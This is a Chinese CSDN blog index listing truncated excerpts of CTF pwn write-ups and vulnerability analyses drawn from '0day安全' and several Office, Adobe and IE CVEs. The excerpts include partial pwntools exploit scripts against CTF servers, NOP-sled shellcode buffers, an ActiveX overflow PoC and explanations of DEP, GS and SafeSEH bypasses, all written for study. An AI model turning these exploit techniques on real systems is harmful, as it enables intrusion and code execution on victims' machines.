SakuraTrick-CSDN博客

原创 BUUOJ PWN [ZJCTF 2019]Login

输入这些断了下来是在call rax那断了下来，追踪一下rax[rbp+var_130]的地址作为参数传入User::read_password(void)，rax的值赋给了[rbp+var_130]在password_checker()看看rax怎么来的这样的话控制[rbp+var_18]为Admin::shell地址就可以了输入password覆盖到[rbp+var_18]0x60-0x18=72=14+58由于_snprintf函数，写入的不含一定0字符的password格式

2020-11-18 21:33:02 372 1

原创 BUUOJ PWN bjdctf_2020_babyrop2

开启的安全机制maingift利用格式化字符串泄露canaryvuln栈溢出泄露libc栈溢出执行system(“bin/sh\x00”)scanf允许输入6字节，输入参数，输出偏移为6的地址，canary的偏移就为7这样输入%7$p就可以泄露canaryEXPfrom pwn import *from LibcSearcher import LibcSearcherp = remote("node3.buuoj.cn",27004)elf = ELF("./bjdc

2020-11-12 15:18:28 227 1

原创 BUUOJ PWN picoctf_2018_rop chain

EXP1from pwn import*from LibcSearcher import LibcSearcher#p=process("./PicoCTF_2018_rop_chain")p=remote("node3.buuoj.cn",25091)elf=ELF('./PicoCTF_2018_rop_chain')start=0x080484D0payload=(0x18+4)*'a'+p32(elf.plt['puts'])+p32(start)+p32(elf.got['put

2020-11-07 17:40:50 195

原创 BUUOJ Web [HCTF 2018]WarmUp

这道是第一道web题，对我这个菜鸡来说还是收获不少打开页面源代码提示进入这个页面得到代码<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];

2020-11-06 17:55:21 363

原创 HITCON Training lab14 magic heap

咕了有段时间了，再咕一阵子吧（错乱这是个典型的unsorted bin attackedit函数可以自己输入更大的size,并修改堆块控制choice为4869，magic>4869即可get flag思路：1.free chunk ->unsorted bin2.利用edit函数构造堆块内容，修改链入unsorted bin的freechunk的bk指针为&magic-163.malloc chunk -> 触发unsorted bin attackEX

2020-11-06 01:30:21 258

原创 CVE-2012-0158-Microsoft Office MSComCtl.ocx 栈溢出漏洞

测试环境Microsoft Office 2003win xp sp3测试样本用metasploit生成弹计算器的样本可以成功弹出计算器漏洞分析打开poc,触发崩溃从栈顶向上回溯，看到了MSCOMCTL模块跟进去看看，下断

2020-11-01 16:46:15 160

原创暴风影音 M3U 文件解析漏洞

漏洞简介这是一个对 M3U 文件解析的漏洞，程序在读取 M3U 文件内容时未对内容长度进行有效性判断M3U 文件简介媒体文件的列表文件，换句话说它是媒体播放器的播放列表文件。漏洞原理及利用分析暴风影音可以播放不同格式的媒体文件，所以它在打开文件时必然会对文件的扩展名进行检测，由此想到可以在程序里查找“.M3U”字符串，然后在这个参考字符串上设置断点打开poc,断下单步到这，弹出计算器，下断，重载跟进，继续下断，继续继续strcat这没检测连接字符串长度执行过之后，看看s

2020-10-24 14:22:29 453

原创 CVE-2009-0927： PDF 中的 JS

简介Adobe Re ader 是非常流行的 PDF 文件阅读器，在其 Collab 对象的 getIcon()函数中存在一个缓冲区溢出漏洞。同时由于 PDF 文档中支持内嵌的 JavaScript，攻击者可以通过在 PDF 文档中植入恶意的JavaScript来向getIcon()函数传递特制的参数以触发溢出漏洞，并结合Heap Spray攻击来夺取计算机的控制权。漏洞原理及利用分析用od载入acrord32.exe,再打开poc,不能捕获到异常，换成Immunity Debugger才行将ed

2020-10-22 09:14:01 345

原创《0day安全》 MS06-055 分析：实战 Heap Spray

MS06-055 简介MS06-055 指的是 IE 在解析 VML 标记语言时存在的基于栈的缓冲区溢出漏洞。漏洞分析引起栈溢出的是 IE 的核心组件 vgx.dll。vgx.dll is a module associated with Microsoft Vector Graphics Rendering(VML) from Microsoft Corporation.引起漏洞的函数是 SHADETYPE_TEXT::TEXT(ushort co nst * ,in t)，它会将页面中<

2020-10-14 21:36:59 218

原创《0day安全》 RPC 入侵：MS06-040 与 MS08-067

RPC 简介在分布式计算，远程过程调用（英语：Remote Procedure Call，缩写为 RPC）是一个计算机通信协议。该协议允许运行于一台计算机的程序调用另一个地址空间（通常为一个开放网络的一台计算机）的子程序，而程序员就像调用本地程序一样，无需额外地为这个交互作用编程（无需关注细节）。RPC是一种服务器-客户端（Client/Server）模式，经典实现是一个通过发送请求-接受回应进行信息交互的系统。如果涉及的软件采用面向对象编程，那么远程过程调用亦可称作远程调用或远程方法调用，例：Ja

2020-10-14 14:34:25 460

原创《0day安全》FTP 的漏洞挖掘：缓冲区溢出

// GS_Virtual.cpp : 定义控制台应用程序的入口点。//#include <stdlib.h>#include <string.h>#include <stdio.h>#include <windows.h>char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x9

2020-09-26 10:38:34 356

原创《0day安全》利用 Ret2Libc 挑战 DEP

溢出攻击的根源在于现代计算机对数据和代码没有明确区分这一先天缺陷。DEP（数据执行保护，Data Execution Prevention）就是用来弥补计算机对数据和代码混淆这一天然缺陷的。DEP 的基本原理是将数据所在内存页标识为不可执行，当程序溢出成功转入 shellcode 时，程序会尝试在数据页面上执行指令，此时 CPU 就会抛出异常，而不是去执行恶意指令。利用 Ret2Libc 挑战 DEP绕过 DEP的 exploit 方法：（1）通过跳转到 ZwSetInformationProc

2020-09-21 19:26:52 258

原创《0day安全》亡羊补牢：SafeSEH

本节所有关于绕过 SafeSEH 机制的讨论均不考虑 DEP 的影响。攻击返回地址绕过 SafeSEH利用虚函数绕过 SafeSEH和上一章介绍的类似，通过攻击虚函数表来劫持程序流程，这个过程不涉及任何异常处理，SafeSEH 也就只是个摆设。从堆中绕过 SafeSEH程序中断前刚刚完成堆中空间的申请，此时寄存器 EAX 中存放着申请空间的首地址，所以 0x328b8也就是 shellcode 的首地址被溢出的字符串起始位置为 0x0013FE8CS.E.H 异常处理函数指针位于0x001

2020-09-12 20:50:14 231

原创《0day安全》栈中的守护天使：GS

针对缓冲区溢出时覆盖函数返回地址这一特征，微软在编译程序时使用了一个很酷的安全编译选项——GS，在 Visual Studio 2003 (VS 7.0)及以后版本的 Visual Studio 中默认启用了这个编译选项。以下情况不会应用 GS：（1）函数不包含缓冲区。（2）函数被定义为具有变量参数列表。（3）函数使用无保护的关键字标记。（4）函数在第一个语句中包含内嵌汇编代码。（5）缓冲区不是 8 字节类型且大小不大于 4 个字节。修改栈帧中函数返回地址的经典攻击将被 GS 机制有效遏制；

2020-09-09 21:11:08 237

原创《0day安全》——利用 S.E.H

利用 Windows 异常处理机制的基本思路（1）S.E.H 存放在栈内，故溢出缓冲区的数据有可能淹没 S.E.H。（2）精心制造的溢出数据可以把 S.E.H 中异常处理函数的入口地址更改为 shellcode 的起始地址。（3）溢出后错误的栈帧或堆块数据往往会触发异常。（4）当 Windows 开始处理溢出后的异常时，会错误地把 shellcode 当作异常处理函数而执行。在栈溢出中利用 S.E.H代码#include "stdio.h"#include <windows.h>

2020-09-07 14:08:59 216

原创《0day安全》堆溢出利用（下）——代码植入

狙击 P.E.B 中 RtlEnterCritical-Section()的函数指针这里，我们不妨以0x7FFDF024处的RtlEnterCriticalSection()指针为目标，联系一下DWORD SHOOT 后，劫持进程、植入代码的全套动作。用于实验的代码如下。#include <windows.h>char shellcode[]="\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90""\x90\x90\x90\x90\x90\x90\x90

2020-09-07 09:21:37 284

原创《0day安全》堆溢出利用（上） DWORD SHOOT

堆溢出利用的精髓就是用精心构造的数据去溢出下一个堆块的块首，改写块首中的前向指针（flink）和后向指针（blink），然后在分配、释放、合并等操作发生时伺机获得一次向内存任意地址写入任意数据的机会。我们把这种能够向内存任意位置写入任意数据的机会称为“DWORD SHOOT”。在调试中体会“DWORD SHOOT”代码#include <windows.h>main(){HLOCAL h1, h2,h3,h4,h5,h6;HANDLE hp;hp = HeapCreate(0,

2020-09-07 00:18:19 313

原创阿里旺旺ActiveX控件ImageMan溢出漏洞分析

用ComRaider模糊测试针对ActiveX控件的漏洞分析方法poc<html> <body> <object classid="clsid:128D0E38-1FF4-47C3-B0F7-0BAF90F568BF" id="target"></object> <script> var buffer = ''; while (buffer.length < 1111) buffer+="A"; target.AutoP

2020-09-05 23:49:56 292

原创《0day安全》ActiveX 控件的漏洞挖掘

用工具测试 ActiveX 控件：COMRaider安装好程序注册vuln.dll文件启动程序，单击start打开vuln.dll，COMRaider 程序将会分析出当前 ActiveX 控件所有的用户接口这里选择“Method1”用户接口作为被测试用户接口，这是一个函数类型的用户接口，它包含一个 String 类型的参数。右击选择“Fuzz member”选择“Fuzz member”选项后，COMRaider 程序将生成测试模板，同时在程序右下方显示这些测试模板文件单击“Nex

2020-09-04 19:45:57 639

原创《0day安全》堆溢出利用基础学习

堆的调试方法用于调试的代码如下。#include <windows.h>int main(){HLOCAL h1,h2,h3,h4,h5,h6;HANDLE hp;hp = HeapCreate(0,0x1000,0x10000);__asm int 3h1 = HeapAlloc(hp,HEAP_ZERO_MEMORY,3);h2 = HeapAlloc(hp,HEAP_ZERO_MEMORY,5);h3 = HeapAlloc(hp,HEAP_ZERO_MEMORY,6

2020-09-01 20:23:20 422 1

原创 CVE-2011-0104 Microsoft Excel TOOLBARDEF 记录解析栈溢出漏洞漏洞分析

分析环境win xp sp3,IDA,OD,windbgoffice excel 2003 sp3基于污点追踪思路的漏洞分析方法运行excel.exe,然后windbg加载运行，打开exploit.xlb,触发异常(eb8.b2c): Access violation - code c0000005 (first chance)First chance exceptions are reported before any exception handling.This exception ma

2020-08-29 20:13:32 332

原创 CVE-2010-3333 Microsoft RTF栈溢出漏洞分析

参考：《漏洞战争》漏洞描述Microsoft Office XP SP3，Office 2003 SP3，Office 2007 SP2，Office 2010等多个版本的Office软件中的Open XML文件格式转换器存在栈溢出漏洞，主要是在处理RTF中的“pFragments”属性时存在栈溢出，导致远程攻击者可以借助特制的RTF数据执行任意代码，因此该漏洞又名“RTF栈缓冲区溢出漏洞”。分析环境所用环境操作系统windows xp sp3调试器windbg漏

2020-08-25 17:39:51 934

weixin_50287973的博客